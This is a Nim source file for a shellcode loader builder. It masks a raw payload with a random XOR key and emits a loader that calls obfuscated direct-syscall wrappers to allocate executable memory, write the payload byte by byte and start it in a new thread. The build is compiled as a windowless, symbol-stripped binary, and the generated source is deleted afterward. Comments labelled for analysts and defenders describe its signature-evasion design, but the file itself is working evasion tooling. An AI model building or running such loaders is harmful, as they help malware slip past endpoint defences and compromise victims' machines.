import os, strformat, strutils, lib/sysrandom
proc mainCode(shellcode: string, key: string): string =
  ## Renders the source text of the loader that `main` compiles.
  ##
  ## `shellcode` is the already-masked payload as a Nim array literal
  ## (`[byte 1, 2, ...]`) and `key` the matching key literal; both are spliced
  ## verbatim into the template below by `strformat`.
  ##
  ## What the emitted program does (read off the template, for analysts):
  ## * includes `lib/syscalls.nim`, which must define the five
  ##   randomised-looking wrappers called below (NtOpenProcess,
  ##   NtAllocateVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx,
  ##   NtClose per the template's own comments — confirm against that file);
  ## * prints its own PID, then opens a handle to its OWN process
  ##   (client_id = GetCurrentProcessId) with PROCESS_ALL_ACCESS;
  ## * allocates a PAGE_EXECUTE_READWRITE region of `shellcode.len` bytes;
  ## * unmasks the payload one byte at a time — every key byte is applied in
  ##   turn to the same byte, so the effective mask is the XOR-fold of the
  ##   key — and writes each byte with a separate 1-byte write call;
  ## * sleeps 10 s, starts a thread at `run` with the region as argument,
  ##   waits for it with timeout -1, and closes both handles.
  ## Every `status` value is assigned but never checked.
  ##
  ## Defender notes: the per-run key makes the payload bytes useless as a
  ## static signature; the stable parts are the loader structure (self-open
  ## with PROCESS_ALL_ACCESS, RWX allocation, byte-wise writes, new thread on
  ## a freshly allocated private region, fixed 10 s delay) and whatever
  ## `lib/syscalls.nim` emits for its wrappers.
  # The template is a `&"""` format string, so a literal `{.nimcall.}` cannot
  # appear in it directly (braces are interpolation syntax); it is injected
  # through this variable instead.
  let nimcall = "{.nimcall.}"
  result = &"""
include "lib/syscalls.nim"
var shellcode = {shellcode}
let key = {key}
proc run(buffer: pointer): DWORD =
  var function: proc ()
  function = cast[(proc(): void {nimcall})](buffer)
  function()
proc main() =
  let processID: DWORD = GetCurrentProcessId()
  var client_id: CLIENT_ID
  var obj_attr: OBJECT_ATTRIBUTES
  var process: HANDLE
  var tHandle: HANDLE
  var base_addr: LPVOID
  var psize: SIZE_T = cast[SIZE_T](shellcode.len)
  echo $processID
  client_id.UniqueProcess = cast[HANDLE](processID)
  #NtOpenProcess
  var status = RxkzcQmUAYLRVNPU(
    &process,
    PROCESS_ALL_ACCESS,
    &obj_attr, &client_id
  )
  #NtAllocateVirtualMemory
  status = jXqvrXZAnszpxgAQ(
    process, &base_addr, 0, &psize,
    MEM_COMMIT,
    PAGE_EXECUTE_READWRITE)
  var n: cint = 0
  #NtWriteVirtualMemory
  for i in 0..shellcode.len - 1:
    for k in 0..key.len - 1:
      shellcode[i] = shellcode[i] xor key[k]
    status = KgnsbNKJvLjCzCdw(
      process,
      cast[LPVOID](cast[ULONG_PTR](base_addr) + n),
      unsafeAddr shellcode[i],
      0x1,
      NULL)
    n += 1;
  Sleep(10000)
  #NtCreateThreadEx
  status = RgsaByzRzNoIffDM(
    &tHandle,
    THREAD_ALL_ACCESS,
    NULL,
    process,
    run,
    base_addr, FALSE, 0, 0, 0, NULL)
  WaitForSingleObject(tHandle, -1)
  #NtClose
  status = qTBdyplOmaCsBBJV(tHandle)
  status = qTBdyplOmaCsBBJV(process)
main()
"""
proc main() =
  ## Command-line entry: reads a raw payload file, masks it with a fresh
  ## 5-byte random key, writes the loader source (`mainCode`) to `main.nim`,
  ## compiles it, and removes the source again.
  ##
  ## Observed behaviour worth knowing when triaging this tool or its output:
  ## * the usage line is printed when the argument count is wrong, but
  ##   execution continues into `paramStr(2)` regardless; the `-f` flag in
  ##   `paramStr(1)` is never inspected;
  ## * the key comes from `lib/sysrandom` (not on this page), so every build
  ##   carries a different key and therefore different masked bytes;
  ## * the payload is read in 1024-byte chunks and the last byte of each
  ##   chunk is appended without a trailing comma, so inputs larger than one
  ##   chunk are rendered differently at the chunk boundary;
  ## * the build uses `--app:gui` (no console window) and `--passL:-s`
  ##   (stripped symbols) — properties of the produced binary;
  ## * `main.nim` is deleted after the build, so only the compiled loader
  ##   remains on disk.
  defer: closeRandom()
  if(paramCount() != 2):
    echo fmt"[!] Usage: {paramStr(0)} -f shellcode.bin"
  var key = getRandomBytes(5)  # presumably seq[byte]; indexed below — verify
  var file = open(paramStr(2), FileMode.fmRead)
  var mfile = open("main.nim", fmWrite)
  defer: file.close
  const BufSize = 1024
  var shellcode: array[BufSize, byte]
  var done = false
  var output: string = "[byte "
  # Key rendered as the Nim array literal that is spliced into the loader.
  var fmtkey: string = fmt"[byte {key[0]}, {key[1]}, {key[2]}, {key[3]}, {key[4]}]"
  while not done:
    let count = readBuffer(file, addr shellcode[0], BufSize)
    for i in 0..count - 1:
      # Every key byte is applied to the same input byte, so the effective
      # mask is the XOR-fold of the key (mirrors the loop in the loader).
      for k in 0..key.len - 1:
        shellcode[i] = shellcode[i] xor key[k]
      if i == count - 1:
        output = output & $shellcode[i]
      else:
        output = output & $shellcode[i] & ","
    done = count == 0
  output = output & "]"
  mfile.write mainCode(output, fmtkey)
  mfile.close
  # Fixed command string; no user-controlled input is interpolated into it.
  discard execShellCmd("nim c -d:mingw --cpu:amd64 --passL:-s --app:gui --gc:arc main.nim")
  removeFile("main.nim")
# Program entry point: the generator runs unconditionally on module load.
main()